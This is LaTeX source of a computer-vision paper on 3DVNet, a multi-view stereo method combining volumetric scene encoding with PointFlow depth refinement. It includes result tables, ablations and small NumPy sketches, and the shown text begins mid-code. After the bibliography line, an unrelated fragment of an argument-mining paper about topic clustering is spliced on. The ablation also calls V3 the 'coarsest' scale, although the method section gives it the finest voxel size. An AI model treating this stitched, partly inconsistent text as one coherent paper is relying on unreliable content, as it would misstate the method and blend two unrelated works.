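off_surface = np.arange(views, dtype=float)[:, None] * np.ones((1, channels))

# On-surface: zero variance in every channel; off-surface: high variance.
v_on = variance_feature(on_surface)
v_off = variance_feature(off_surface)
```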
\textbf{Point Cloud Voxelization:} To form our initial feature volume, we regularly sample an initial 3D grid of points $\vect{C}$ every $r=8$ cm within the axis-aligned bounding box of point cloud $\vect{X}$ and define the voxel associated with each grid point $\vect{c} \in \vect{C}$ as the $8$ $\textrm{cm}^3$ cube with center $\vect{c}$.
We denote the set of depth points that fall within a voxel with center $\vect{c} \in \vect{C}$ as $v(\vect{c})~=~\{\vect{p} \in \vect{X}: ||\vect{c} - \vect{p}||_\infty \leq \frac{r}{2} \}$.
We sparsify this grid by discarding $\vect{c} \in \vect{C}$ if no depth points lie within the associated voxel, denoting this set of grid coordinates as $\vect{\hat{C}} = \{ \vect{c} \in \vect{C} : v(\vect{c}) \neq \emptyset \}$.
For $\vect{c} \in \vect{\hat{C}}$, we produce a feature for the associated voxel using PointNet \cite{qi2017pointnet} with max pooling.
The PointNet feature for each voxel is defined as:
\begin{equation} \label{eq:pn}
\vect{f}_v(\vect{c}) = \underset{\vect{p} \in v(\vect{c})}{\triangle} h_{\theta}\left(\textrm{concat}\left[\vect{p} - \vect{c}, \boldsymbol{\sigma}^2(\vect{p})\right]\right)
\end{equation}
where $h_{\theta}$ is a learnable multi-layer perceptron (MLP), $\textrm{concat}\left[\vect{q}, \vect{f}\right]$ denotes concatenation of the 3D coordinates $\vect{q}$ with the feature channels of $\vect{f}$, yielding a feature with 3 additional channels, and $\triangle$ is the channel-wise max pooling operation.
The result of this stage is a sparse feature volume $\vect{V}_0$ with features given by Eq.~\ref{eq:pn} and coordinates $\vect{\hat{C}}$.
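The voxelization and per-voxel pooling described above can be sketched as follows; the learnable MLP $h_\theta$ is replaced by an identity stand-in purely for illustration:

```python
import numpy as np

def voxelize(points, r=0.08):
    """Bucket points into occupied voxels of edge length r (the sparse grid);
    keys are integer voxel coordinates, values are point indices."""
    keys = map(tuple, np.floor(points / r).astype(int))
    voxels = {}
    for i, key in enumerate(keys):
        voxels.setdefault(key, []).append(i)
    return voxels

def voxel_features(points, feats, voxels, r=0.08, h=lambda x: x):
    """Max-pooled per-voxel feature; `h` stands in for the learned MLP."""
    out = {}
    for key, ids in voxels.items():
        center = (np.array(key) + 0.5) * r        # voxel center c
        local = np.concatenate([points[ids] - center, feats[ids]], axis=1)
        out[key] = h(local).max(axis=0)           # channel-wise max pool
    return out

pts = np.array([[0.01, 0.01, 0.01], [0.05, 0.02, 0.03], [0.09, 0.01, 0.01]])
fts = np.arange(6.0).reshape(3, 2)                # e.g. variance features
vox = voxelize(pts)                               # 2 occupied voxels
V0 = voxel_features(pts, fts, vox)                # 3 + 2 = 5 channels each
```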
\textbf{Multi-Scale 3D Feature Extraction:} In this stage, we use a sparse 3D U-Net to model the underlying scene geometry.
We use a basic U-Net architecture with skip connections.
Group normalization is used throughout.
See supplementary material for a more detailed description of our architecture.
Our sparse U-Net takes as input sparse feature volume $\vect{V}_0$.
From intermediate outputs of the U-Net, we extract three scales of feature volumes $\vect{V}_1$, $\vect{V}_2$, $\vect{V}_3$ with a voxel edge length of $4r = 32$ cm, $2r = 16$ cm, and $r = 8$ cm, respectively, describing the scene.
In this way, we extract a rich, multi-scale, volumetric encoding of the scene.
\begin{figure}[t]
\begin{center}
\includegraphics[width=\linewidth]{figures/sparse_interp.jpg}
\end{center}
\vspace{-0.6cm}
\caption{Diagram of standard PointFlow hypothesis point construction and our proposed feature generation, shown in 2D for simplicity. The feature volume in the diagram corresponds to a single scale of our multi-scale scene encoding.
Our key change from the original formulation is to generate hypothesis point features by trilinear interpolation of our volumetric scene encoding rather than edge convolutions on the point cloud from a single back-projected depth map.
}
\label{fig:interp}
\end{figure}
\subsection{PointFlow-Based Refinement} \label{sec:refinement}
\begin{figure*}[t]
\begin{center}
\includegraphics[width=0.9\linewidth]{figures/3dvnet.png}
\end{center}
\vspace{-0.6cm}
\caption{Overview of the full 3DVNet pipeline. See Secs.~\ref{sec:3d-network} and \ref{sec:refinement} for a description of our scene modeling and refinement.}
\label{fig:3dvnet}
\end{figure*}
In this stage, we use our multi-scale scene encoding $\vect{V}_1, \vect{V}_2, \vect{V}_3$ from the previous stage in a variation of the PointFlow algorithm proposed by Chen \etal~\cite{chen2019ptmvs}.
The goal is to refine our predicted depth maps to match our scene model by predicting a residual for each depth pixel.
We briefly review the core components of PointFlow and the intuition behind our proposed change.
In PointFlow, a set of points called \textit{hypothesis points} are constructed at regular intervals along a depth ray, centered about the depth prediction associated with the given depth ray. The blue and red points in Fig.~\ref{fig:interp} illustrate this.
Features are generated for the hypothesis points.
Then, a network processes these features and outputs a probability score for every point indicating the confidence that the given point is at the correct depth.
Finally, the expected offset is calculated using these probabilities and added to the original depth prediction.
Our key innovation is the use of our multi-scale scene encoding to generate the hypothesis point features.
In the original PointFlow, hypothesis points are constructed for a \textit{single} depth map, augmented with features using Eq.~\ref{eq:var}, and aggregated into a point cloud.
Note this point cloud is strictly different from our point cloud as (1) it is produced using a \textit{single} depth map, and (2) it includes hypothesis points.
Features are generated for each point using edge convolutions \cite{dgcnn} on the k-Nearest-Neighbor (kNN) graph.
Crucially, these edge convolutions never operate on a unified 3D scene representation in the original PointFlow.
This prevents the offset predictions from learning global information, which we believe is a critical step for depth residual prediction.
Furthermore, because of the required kNN search, this formulation cannot scale to process a joint point cloud built from an arbitrary number of depth maps, which again prevents it from learning global information.
Inspired by convolutional occupancy networks \cite{peng2020conet} and IFNets \cite{chibane20ifnet}, we instead generate hypothesis features by interpolating each scale of our multi-scale scene encoding (see Fig.~\ref{fig:interp}).
With this key change, we use powerful scene-level priors in our offset prediction conditioned on all $N$ depth predictions for a given scene.
Furthermore, by using the same encoding to update all $N$ depth predictions, we encourage global consistency of predictions.
We now describe in detail our variation of the PointFlow method (see Figs.~\ref{fig:main} and~\ref{fig:interp}), using notation similar to the original paper.
\textbf{Hypothesis Point Construction:}
For a given back-projected depth pixel $\vect{p}$ from depth map $\vect{D}_n$, we generate $2h+1$ point hypotheses $\{\vect{\tilde{p}}_k\}$:
\begin{equation}
\vect{\tilde{p}}_k = \vect{p} + ks\vect{t}, \quad k = -h, \dots, h
\end{equation}
where $\vect{t}$ is the normalized reference camera direction of $\vect{D}_n$, and $s$ is the displacement step size.
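Hypothesis point construction is a simple linear sweep along the viewing ray; a minimal sketch with the paper's default parameters:

```python
import numpy as np

def hypothesis_points(p, t, s=0.05, h=3):
    """2h+1 hypotheses p_k = p + k*s*t for k = -h, ..., h along the
    normalized reference camera direction t, centered on the prediction p."""
    ks = np.arange(-h, h + 1)
    return p[None, :] + ks[:, None] * s * t[None, :]

p = np.array([1.0, 0.0, 2.0])   # back-projected depth pixel
t = np.array([0.0, 0.0, 1.0])   # normalized camera direction
pts = hypothesis_points(p, t)   # (7, 3), centered on p
```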
\textbf{Feature Generation:} We generate a multi-scale feature for each hypothesis point $\vect{\tilde{p}}_k$ using trilinear interpolation of our sparse feature volumes $\vect{V}_1, \vect{V}_2, \vect{V}_3$ at point $\vect{\tilde{p}}_k$, using $0$s where features are not defined:
\begin{equation}
\vect{f}_i(\vect{\tilde{p}}_k) = \textrm{sparse\_interp}(\vect{V}_i, \vect{\tilde{p}}_k), \quad i = 1, 2, 3
\end{equation}
Next, we generate a variance feature $\boldsymbol{\sigma}^2(\vect{\tilde{p}}_k)$ for hypothesis point $\vect{\tilde{p}}_k$ using Eq.~\ref{eq:var}.
The final feature for a hypothesis point is the channel-wise concatenation of these features:
\begin{equation} \label{eq:pf-feats}
\vect{f}_k(\vect{\tilde{p}}_k) = \textrm{concat}\left[ \vect{f}_1(\vect{\tilde{p}}_k), \vect{f}_2(\vect{\tilde{p}}_k), \vect{f}_3(\vect{\tilde{p}}_k), \boldsymbol{\sigma}^2(\vect{\tilde{p}}_k) \right]
\end{equation}
We stack our $2h+1$ point-hypothesis features to form a 2D feature $\vect{H} \in \mathbb{R}^{(2h+1)\times c}$, where $c$ is the sum of the dimensions of our variance and scene encoding features.
\textbf{Offset Prediction:} We apply a 4-layer 1D CNN followed by a softmax function to predict a probability score for each point-wise entry in $\vect{H}$.
The predicted displacement of point $\vect{p}$ is then as follows:
\begin{equation}
\Delta d_p = \mathbb{E}(ks) = \sum_{k=-h}^{h} ks \times \textrm{Prob}(\vect{\tilde{p}}_k)
\end{equation}
The updated depth for each depth map is the depth of point $\vect{p} + \vect{t}\Delta d_p$ with respect to the camera associated with $\vect{D}_n$.
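The offset prediction reduces to an expectation under a softmax distribution over the $2h+1$ hypotheses; a minimal sketch of that final step (the 1D CNN producing the scores is omitted):

```python
import numpy as np

def expected_offset(scores, s=0.05, h=3):
    """Softmax the 2h+1 per-hypothesis scores into probabilities,
    then return the expected displacement Delta d_p = E[k*s]."""
    e = np.exp(scores - scores.max())   # numerically stable softmax
    prob = e / e.sum()
    ks = np.arange(-h, h + 1)
    return float((ks * s * prob).sum())

uniform = np.zeros(7)                   # no preference: zero expected offset
peaked = np.full(7, -100.0)
peaked[-1] = 100.0                      # all mass on k = +h: offset ~ h*s
```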
\subsection{Bringing It All Together: 3DVNet} \label{sec:3dvnet}
In this section, we describe our full depth-prediction pipeline using our multi-scale volumetric scene modeling and PointFlow-based refinement, which we name 3DVNet
(see Fig.~\ref{fig:3dvnet}).
Our pipeline consists of (1) initial feature extraction and depth prediction, (2) scene modeling and refinement, and (3) upsampling of our refined depth map to the size of the original image.
The scene modeling and refinement is done in a nested for-loop fashion, extracting a scene model in the outer loop and iteratively refining the depth predictions using that scene model in the inner loop.
We fix the input image size of 3DVNet to $320 \times 256$.
\textbf{2D Feature Extraction:} For our 2D feature extraction, we adopt the approach of D\"uz\c{c}eker \etal~\cite{duzceker2020dvmvs}, and use a 32 channel feature pyramid network (FPN) \cite{lin2017fpn} constructed on a MnasNet \cite{tan2019mnas} backbone to extract coarse and fine resolution feature maps of size $80 \times 64$ and $160\times 128$ respectively.
For every image $\vect{I}_n$, we denote these $\vect{F}_n^c$ and $\vect{F}_n^f$.
\textbf{MVSNet Prediction:} For the coarse depth prediction of image $\vect{I}_n$, we use a small MVSNet \cite{yao2018mvs} using the reference and source coarse feature maps $\{\vect{F}^\textit{c}_s : s \in \vect{S}_n\}$ to predict an initial coarse depth $\vect{D}_n^0$.
Our cost volume is constructed using traditional plane sweep stereo with $L = 96$ depth hypotheses sampled uniformly at intervals of 5 cm starting at 50 cm.
Similar to Yu and Gao~\cite{yu2020fmvs}, our predicted depth map is spatially sparse compared to feature map $\vect{F}^\textit{c}_n$.
We fix our coarse depth map prediction size to $56 \times 56$.
\textbf{Nested For-Loop Refinement:} We denote the updated depths after scene-modeling iteration $l_o$ and PointFlow iteration $l_i$ as $\{\vect{D}_n^{(l_o, l_i)}\}$.
We use initial depth predictions $\{\vect{D}_n^0\}$ and coarse feature maps $\{\vect{F}_n^\textit{c}\}$ to generate multi-scale scene encoding $\vect{V}_1$, $\vect{V}_2$, $\vect{V}_3$.
We then run PointFlow refinement three times with displacement step size $s = 5$ cm, $5$ cm, and $2.5$ cm and $h = 3$ to get updated depths $\{\vect{D}_n^{(1, 3)}\}$.
In early experiments, we found two iterations at $5$ cm to be helpful.
We re-generate our scene encoding using updated depths $\{\vect{D}_n^{(1, 3)}\}$ and coarse feature maps $\{\vect{F}_n^\textit{c}\}$.
We then run PointFlow three more times with step sizes $s = 5$~cm, $5$~cm, and $2.5$ cm and $h = 3$ to get updated depths $\{\vect{D}_n^{(2, 3)}\}$.
We find our depth maps converge at this point.
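The nested for-loop structure can be summarized as follows, with `build_encoding` and `pointflow` as hypothetical stand-ins for the scene-encoding and PointFlow networks described above:

```python
def refine_depths(depths, feats, build_encoding, pointflow,
                  steps=(0.05, 0.05, 0.025), outer=2):
    """Nested refinement: rebuild the multi-scale scene encoding in the
    outer loop, run PointFlow with the given step sizes in the inner loop."""
    for _ in range(outer):
        V = build_encoding(depths, feats)     # V_1, V_2, V_3
        for s in steps:
            depths = pointflow(depths, V, s)  # one PointFlow iteration
    return depths

# Toy check with a scalar "depth": each PointFlow call moves it by s,
# so two outer passes over (0.05, 0.05, 0.025) accumulate 0.25.
result = refine_depths(0.0, None,
                       build_encoding=lambda d, f: None,
                       pointflow=lambda d, V, s: d + s)
```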
\textbf{Coarse-to-Fine Upsampling:} In this stage, we upsample each refined depth prediction $\vect{D}_n^{(2, 3)}$ to the size of image $\vect{I}_n$.
We find PointFlow refinement does not remove interpolation artifacts, as this generally requires predicting large offsets across depth boundaries.
We outline a simple, coarse-to-fine method for upsampling while removing artifacts.
See the right section of Fig.~\ref{fig:3dvnet}.
At each step, we upsample the current depth prediction using nearest-neighbor interpolation to the size of the next-largest feature map and concatenate, using the original image $\vect{I}_n$ in the final step.
We then pass the concatenated feature map and depth through a smoothing network.
We use a version of the propagation network proposed by Yu and Gao \cite{yu2020fmvs}.
For every pixel $\vect{p}$ in depth map $\vect{D}$, the smoothed depth $\vect{\tilde{D}}$ is a weighted sum of $\vect{D}$ in the $3\times 3$ neighborhood about $\vect{p}$:
\begin{equation}
\vect{\tilde{D}}(\vect{p}) = \sum_{\vect{q} \in \{-1, 0, 1\}^2} g_{\theta}\left(\vect{p},\vect{q}\right)\vect{D}(\vect{p} + \vect{q})
\end{equation}
where $g_{\theta}$ is a 4-layer CNN that takes as input the concatenated feature and depth map and outputs 9 weights for every pixel $\vect{p}$,
and $g_{\theta}\left(\vect{p},\vect{q}\right)$ indexes those weights for the pixel $\vect{p}$.
A softmax function is applied to the weights for normalization.
We apply this coarse-to-fine upsampling to every refined depth map $\{\vect{D}_n^{(2, 3)}\}$ to arrive at a final depth prediction $\{\vect{D}_n\}$ for every input image $\{\vect{I}_n\}$.
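The propagation step is a per-pixel weighted sum over the $3\times 3$ neighborhood; a sketch assuming the softmax-normalized weights from $g_\theta$ are already given:

```python
import numpy as np

def smooth_depth(depth, weights):
    """Weighted 3x3 propagation: D_tilde(p) = sum_q g(p, q) * D(p + q).
    `weights` has shape (H, W, 9), softmax-normalized per pixel; in the
    full system they come from the learned network g_theta."""
    H, W = depth.shape
    pad = np.pad(depth, 1, mode='edge')       # replicate borders
    out = np.zeros_like(depth)
    k = 0
    for dy in (-1, 0, 1):
        for dx in (-1, 0, 1):
            out += weights[:, :, k] * pad[1 + dy:H + 1 + dy, 1 + dx:W + 1 + dx]
            k += 1
    return out

D = np.arange(12.0).reshape(3, 4)
w_id = np.zeros((3, 4, 9))
w_id[:, :, 4] = 1.0                           # all mass on the center tap
w_avg = np.full((3, 4, 9), 1.0 / 9.0)         # uniform box smoothing
```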
\section{Experiments}
\begin{table*}[ht]
\begin{small}
\begin{center}
\begin{tabular}{r c c c c c c c c|c c|c}
\thickhline
& \multirow{2}{*}{PMVS} & PMVS & \multirow{2}{*}{FMVS} & FMVS & DVMVS & DVMVS & \multirow{2}{*}{GPMVS} & GPMVS & \multirow{2}{*}{Atlas} & Neural- & \multirow{2}{*}{Ours} \\
& & (FT) & & (FT) & pair & fusion & & (FT) & & Recon & \\
\thickhline
\sc{\textbf{ScanNet}} & & & & & & & & & & & \\
Abs-rel $\downarrow$ & 0.389 & 0.085 & 0.274 & 0.084 & 0.069 & \underline{0.061} & 0.121 & 0.062 & 0.062 & 0.063 & \textbf{0.040} \\
Abs-diff $\downarrow$ & 0.668 & 0.168 & 0.444 & 0.165 & 0.142 & 0.127 & 0.214 & 0.124 & 0.116 & \underline{0.099} & \textbf{0.079} \\
Abs-inv $\downarrow$ & 0.148 & 0.048 & 0.145 & 0.050 & 0.044 & \underline{0.038} & 0.066 & 0.039 & 0.044 & 0.039 & \textbf{0.026} \\
Sq-rel $\downarrow$ & 0.798 & 0.046 & 0.463 & 0.045 & 0.026 & \underline{0.021} & 0.860 & 0.022 & 0.040 & 0.039 & \textbf{0.015} \\
RMSE $\downarrow$ & 1.051 & 0.267 & 0.776 & 0.267 & 0.220 & 0.200 & 0.339 & \underline{0.199} & 0.238 & 0.206 & \textbf{0.154} \\
$\delta < 1.25$ $\uparrow$ & 0.630 & 0.922 & 0.732 & 0.922 & 0.949 & \underline{0.963} & 0.890 & 0.960 & 0.935 & 0.948 & \textbf{0.975} \\
$\delta < 1.25^2$ $\uparrow$ & 0.768 & 0.981 & 0.857 & 0.979 & 0.989 & \textbf{0.992} & 0.971 & \textbf{0.992} & 0.971 & 0.976 & \textbf{0.992} \\
$\delta < 1.25^3$ $\uparrow$ & 0.859 & 0.994 & 0.915 & 0.993 & \underline{0.997} & \underline{0.997} & 0.990 & \textbf{0.998} & 0.985 & 0.989 & \underline{0.997} \\
\hline
\rowcolor{Gray}
Acc $\downarrow$ & 0.093 & \textbf{0.039} & 0.059 & \underline{0.043} & 0.059 & 0.067 & 0.077 & 0.057 & 0.078 & 0.058 & 0.051 \\
\rowcolor{Gray}
Comp $\downarrow$ & 0.303 & 0.256 & 0.184 & 0.212 & 0.145 & 0.128 & 0.150 & 0.111 & \underline{0.097} & 0.108 & \textbf{0.075} \\
\rowcolor{Gray}
Prec $\uparrow$ & 0.651 & \textbf{0.738} & 0.570 & 0.707 & 0.595 & 0.557 & 0.486 & 0.604 & 0.607 & 0.636 & \underline{0.715} \\
\rowcolor{Gray}
Rec $\uparrow$ & 0.317 & 0.433 & 0.486 & 0.454 & 0.489 & 0.504 & 0.453 & \underline{0.565} & 0.546 & 0.509 & \textbf{0.625} \\
\rowcolor{Gray}
F-score $\uparrow$ & 0.409 & 0.529 & 0.511 & 0.541 & 0.524 & 0.520 & 0.459 & \underline{0.574} & 0.573 & 0.564 & \textbf{0.665} \\
\thickhline
\sc{\textbf{TUM-RGBD}} & & & & & & & & & & & \\
Abs-rel $\downarrow$ & 0.318 & 0.111 & 0.273 & 0.113 & 0.117 & 0.095 & 0.102 & \underline{0.093} & 0.163 & 0.106 & \textbf{0.076} \\
Abs-diff $\downarrow$ & 0.642 & 0.275 & 0.573 & 0.281 & 0.339 & 0.273 & 0.243 & 0.239 & 0.404 & \textbf{0.167} & \underline{0.210} \\
$\delta < 1.25$ $\uparrow$ & 0.662 & 0.858 & 0.694 & 0.851 & 0.838 & 0.886 & 0.874 & 0.891 & 0.816 & \textbf{0.912} & \textbf{0.912} \\
\hline
\rowcolor{Gray}
F-score $\uparrow$ & 0.115 & 0.145 & 0.150 & 0.154 & 0.141 & 0.162 & 0.157 & \underline{0.170} & 0.129 & 0.117 & \textbf{0.181} \\
\thickhline
\sc{\textbf{ICL-NUIM}} & & & & & & & & & & & \\
Abs-rel $\downarrow$ & 0.614 & 0.107 & 0.303 & 0.095 & 0.106 & 0.114 & 0.107 & \underline{0.066} & 0.110 & 0.123 & \textbf{0.050} \\
Abs-diff $\downarrow$ & 1.469 & 0.262 & 0.707 & 0.245 & 0.278 & 0.322 & 0.290 & \underline{0.176} & 0.332 & 0.303 & \textbf{0.120} \\
$\delta < 1.25$ $\uparrow$ & 0.311 & 0.877 & 0.659 & 0.894 & 0.878 & 0.847 & 0.855 & \underline{0.965} & 0.833 & 0.709 & \textbf{0.980} \\
\hline
\rowcolor{Gray}
F-score $\uparrow$ & 0.064 & 0.144 & \underline{0.382} & 0.246 & 0.173 & 0.150 & 0.241 & 0.323 & 0.194 & 0.055 & \textbf{0.440} \\
\thickhline
\end{tabular}
\end{center}
\vspace{-0.6cm}
\caption{Metrics for three datasets (ScanNet, TUM-RGBD, and ICL-NUIM). Bold indicates best performing method, underline the second best. White rows indicate 2D depth metrics while gray rows indicate 3D metrics. Vertical lines separate depth-based methods, volumetric methods, and our method. ``FT" denotes method was finetuned on ScanNet. Our method outperforms all other baseline methods by a wide margin on most metrics.}
\label{tab:main-results}
\end{small}
\end{table*}
\subsection{Implementation and Training Details}
\textbf{Libraries:} Our model is implemented in PyTorch using PyTorch Lightning \cite{falcon2019pl} and PyTorch Geometric \cite{FeyLenssen2019pygeo}.
We use Minkowski Engine \cite{choy2019minkowski} as our sparse tensor library.
We use Open3D~\cite{Zhou2018o3d} for both visualization and evaluation.
\textbf{Training Parameters:} We train our network on a single NVIDIA RTX 3090 GPU.
Our network is trained end-to-end with a mini-batch size of 2.
Each mini-batch consists of 7 images for depth prediction.
For our loss function, we accumulate the average $L_1$ error between ground truth and predicted depth maps, appropriately downsampling the ground truth depth map to the correct resolution, for all predicted, refined, and upsampled depth maps at every stage in our pipeline.
Additionally, we employ random geometric scale augmentation with a factor selected between $0.9$ and $1.1$ and random rotation about the gravitational axis.
We first train with the pre-trained MnasNet backbone frozen using the Adam optimizer \cite{kingma2017adam} with an initial learning rate of $10^{-3}$ which is divided by 10 every 100 epochs ($\sim$1.5k iterations), to convergence ($\sim$1.8k iterations).
We unfreeze the MnasNet backbone and finetune the entire network using Adam and an initial learning rate of $10^{-4}$ that is halved every 50 epochs to convergence ($\sim$1.8k iterations).
\subsection{Datasets, Baselines, Metrics, and Protocols}
\textbf{Datasets:} To train and validate our model, we use the ScanNet \cite{dai2017scannet} official training and validation splits.
For our main comparison experiment, we use the ScanNet official test set, which consists of 100 test scenes in a variety of indoor settings.
To evaluate the generalization ability of our model, we select 10 sequences from TUM-RGBD \cite{sturm2012tum-rgbd}, and 4 sequences from ICL-NUIM \cite{handa2014icl-nuim} for comparison.
\textbf{Baselines:} We compare our method to seven state-of-the-art baselines: Point-MVSNet (PMVS) \cite{chen2019ptmvs}, Fast-MVSNet (FMVS) \cite{yu2020fmvs}, DeepVideoMVS pair/fusion networks (DVMVS pair/fusion) \cite{duzceker2020dvmvs}, GPMVS batched \cite{hou2019gpmvs}, Atlas \cite{murez2020atlas}, and NeuralRecon \cite{sun2021neucon}.
The first five baselines are depth-prediction methods while the last two are volumetric methods.
Of these, we consider GPMVS and Atlas the most relevant depth and volumetric methods respectively, as both use information from all frames simultaneously during inference.
We use the ScanNet training scenes to finetune methods not trained on ScanNet~\cite{chen2019ptmvs, hou2019gpmvs, yu2020fmvs}.
We report both the finetuned and pretrained results, denoted with and without ``FT".
To account for range differences between the DTU dataset~\cite{jensen2014large} and ScanNet, we use our model's plane sweep parameters with PMVS and FMVS.
\textbf{Metrics:} We use the 2D and 3D metrics presented by Murez \etal~\cite{murez2020atlas} for evaluation.
See supplementary for definitions.
Amongst these metrics, we consider Abs-rel, Abs-diff, and the first inlier ratio metric $\delta < 1.25$ as the most suitable 2D metrics for measuring depth prediction quality, and F-score as the most suitable 3D metric for measuring 3D reconstruction quality.
Following D\"uz\c{c}eker \etal~\cite{duzceker2020dvmvs}, we only consider ground truth depth values greater than 50 cm to account for some methods not being able to predict smaller depth.
We note F-score, Precision, and Recall are calculated per-scene and then averaged across all scenes.
This yields a different F-score than the one obtained by computing it directly from the reported average Precision and Recall.
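A toy numeric example (hypothetical values) illustrates why per-scene averaging differs from computing the F-score of the averaged Precision and Recall:

```python
def fscore(p, r):
    """Harmonic mean of precision and recall."""
    return 2 * p * r / (p + r)

# Two scenes with different precision/recall trade-offs:
scenes = [(0.9, 0.3), (0.4, 0.8)]
mean_f = sum(fscore(p, r) for p, r in scenes) / len(scenes)   # ~0.492
p_avg = sum(p for p, _ in scenes) / len(scenes)               # 0.65
r_avg = sum(r for _, r in scenes) / len(scenes)               # 0.55
f_of_avg = fscore(p_avg, r_avg)                               # ~0.596
# The two quantities differ in general.
```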
\textbf{Protocols:} For depth-based methods, we fuse predicted depths using the standard multi-view consistency based point cloud fusion.
Based on results on validation sets, we modify the implementation of Galliani \etal \cite{galliani2015gaupuma} to use a \textit{depth}-based multi-view consistency check rather than a \textit{disparity}-based check (see Sec.~3.3 of the supplementary materials).
For volumetric methods, we use marching cubes to extract a mesh from the predicted TSDF.
Following Murez \etal~\cite{murez2020atlas}, we trim the meshes to remove geometry not observed in the ground truth camera frustums.
Additionally, ScanNet ground truth meshes often contain holes in observed regions.
We mask out these holes for all baselines to avoid false penalization.
All meshes are single layer to match ScanNet ground truth as noted by Sun \etal \cite{sun2021neucon}.
We use the DVMVS keyframe selection.
For depth-based methods, we use each keyframe as a reference image for depth prediction.
We use the 2 previous and 2 next keyframes as source images (4 source images total).
For depth-based methods, we resize the output depth map to $640 \times 480$ using nearest-neighbor interpolation.
For volumetric methods, we use the predicted mesh to render $640 \times 480$ depth maps for each keyframe.
\subsection{Evaluation Results and Discussion}
\begin{figure*}[t]
\begin{center}
\includegraphics[width=0.9\linewidth]{figures/depth_grid.png}
\end{center}
\vspace{-0.6cm}
\caption{Qualitative depth results on ScanNet. Our method produces sharp details with well defined object boundaries.}
\label{fig:depth-grid}
\end{figure*}
\begin{figure*}[t]
\begin{center}
\includegraphics[width=0.9\linewidth]{figures/rec_grid.png}
\end{center}
\vspace{-0.6cm}
\caption{Qualitative reconstruction results on ScanNet for the four best-performing methods. Our technique produces globally coherent reconstructions like purely volumetric methods while containing the local detail of depth-based methods.}
\label{fig:rec-grid}
\end{figure*}
See Tab.~\ref{tab:main-results} for 2D depth and 3D geometry metrics on all datasets.
Our method outperforms all baselines by a wide margin on most metrics.
Notably, our Abs-rel error on ScanNet is 0.021 lower than that of DVMVS fusion, the second-best method, while the Abs-rel of the third-, fourth-, and fifth-best methods are all within 0.002 of DVMVS fusion.
Similarly, our ScanNet F-score is 0.09 higher than that of GPMVS (FT), the second-best method, while the F-score of Atlas, the third-best method, is within 0.001 of GPMVS (FT).
This demonstrates the significant quantitative improvement of our method in both depth and reconstruction metrics. Results on additional datasets show the strong generalization ability of our model.
We include qualitative results on ScanNet.
See Figs.~\ref{fig:depth-grid} and~\ref{fig:rec-grid}.
See Sec.~4 of the supplementary materials for additional qualitative results.
Our depth maps are visually pleasing, with clearly defined edges.
They are comparable in quality to those of GPMVS and DVMVS fusion while being quantitatively more accurate.
Our reconstructions are coherent like volumetric methods, without the noise present in other depth-based reconstructions, which we believe is a result of our volumetric scene encoding and refinement.
We do note one benefit of Atlas is its ability to fill large unobserved holes.
Though not reflected in the metrics, this leads to qualitatively more complete reconstructions.
Our system relies on depth maps and thus cannot do this as designed.
However, as a result of averaging across image features, Atlas produces meshes that are overly smooth and lack detail.
In contrast, our reconstructions contain sharper, better defined features than purely volumetric methods.
Finally, we note our system cannot naturally be run in an online fashion, as it requires all frames to be available before processing.
\begin{table}[t]
\begin{small}
\begin{center}
\begin{tabular}{c|c|c c c|g}
\thickhline
$l_o$ & $l_i$ & Abs-rel & Abs-diff & $\delta < 1.25$ & F-score\\
\hline
0 & 0 & 0.070 & 0.137 & 0.949 & 0.559 \\
\hline
1 & 1 & 0.050 & 0.100 & 0.965 & 0.651 \\
1 & 2 & 0.044 & 0.088 & 0.971 & 0.661 \\
1 & 3 & 0.043 & 0.086 & 0.972 & 0.664 \\
\hline
2 & 1 & 0.041 & 0.081 & 0.974 & 0.668 \\
2 & 2 & 0.040 & 0.079 & 0.975 & 0.667 \\
2 & 3 & 0.040 & 0.079 & 0.975 & 0.665 \\
\hline
\end{tabular}
\end{center}
\vspace{-0.6cm}
\caption{Metrics as a function of number of inner PointFlow-refinement iterations (denoted $l_i$) and number of outer-loop scene-modeling passes (denoted $l_o$).}
\label{tab:iters}
\end{small}
\end{table}
\begin{table}[t]
\begin{small}
\begin{center}
\begin{tabular}{c c c c|g}
\thickhline
Model & Abs-rel & Abs-diff & $\delta < 1.25$ & F-score\\
\hline
no 3D & 0.067 & 0.134 & 0.952 & 0.551 \\
single scale & 0.041 & 0.080 & 0.973 & 0.662 \\
avg feats & 0.043 & 0.082 & 0.975 & 0.656 \\
full & 0.040 & 0.079 & 0.975 & 0.665 \\
\hline
\end{tabular}
\end{center}
\vspace{-0.6cm}
\caption{Metrics for our ablation study. See Sec.~\ref{sec:additional-studies} for descriptions of each condition.}
\label{tab:ablation}
\end{small}
\end{table}
\subsection{Ablation and Additional Studies} \label{sec:additional-studies}
\textbf{Does Iterative Refinement Help?} We study the effect of each inner and outer loop iteration of our depth refinement. See Tab.~\ref{tab:iters}.
We exceed state-of-the-art metrics after 2 iterations.
Three additional iterations yield continued improvement, confirming the effectiveness of iterative refinement.
By 5 iterations, our metrics have converged: the depth metrics stabilize while the F-score decreases slightly, so the final iteration appears mildly detrimental to reconstruction quality.
\textbf{Does Multi-Scale Scene Modeling Help?} To test this, we (1) completely remove our multi-scale scene encoding from the PointFlow refinement, and (2) only use the coarsest scale $\vect{V}_3$, respectively denoted ``no 3D" and ``single scale" in Tab.~\ref{tab:ablation}.
Without any scene-level information, our refinement breaks down, indicating the scene modeling is essential.
The single scale model does slightly worse, confirming the effectiveness of our multi-scale encoding.
\textbf{Do Multi-View Matching Features Help?}
We use a per-channel average instead of variance aggregation for each point in our feature-rich point cloud, denoted ``avg feats" in Tab.~\ref{tab:ablation}.
Most metrics, notably the F-score, suffer.
This supports our hypothesis that multi-view matching is more beneficial for reconstruction than averaging.
For additional studies, see the supplementary material.
\section{Conclusion}
We present 3DVNet, which uses the advantages of both depth-based and volumetric MVS.
We perform experiments with 3DVNet to show depth-based iterative refinement and multi-view matching combined with volumetric scene modeling greatly improves both depth-prediction \textit{and} reconstruction metrics.
We believe our 3D scene-modeling network bridges an important gap between depth prediction, image feature aggregation, and volumetric scene modeling and has applications far beyond depth-residual prediction.
In future work, we will explore its use for segmentation, normal estimation, and direct TSDF prediction.
\vspace{0.2cm}
\noindent\textbf{Acknowledgements: }Support for this work was provided by ONR grants N00014-19-1-2553 and N00174-19-1-0024, as well as NSF grant 1911230.
{\small
\bibliographystyle{ieee_fullname}
\section{Approach}
\label{sec:Approach}
\label{sec:Approach:Overview}
In this section, we present the different steps of our framework: (1)~topic clustering, (2)~argument identification, and (3)~argument clustering according to topical aspects (see Figure~\ref{fig:Approach:Pipeline}).
\subsection{Topic Clustering}
\label{sec:Approach:DS}
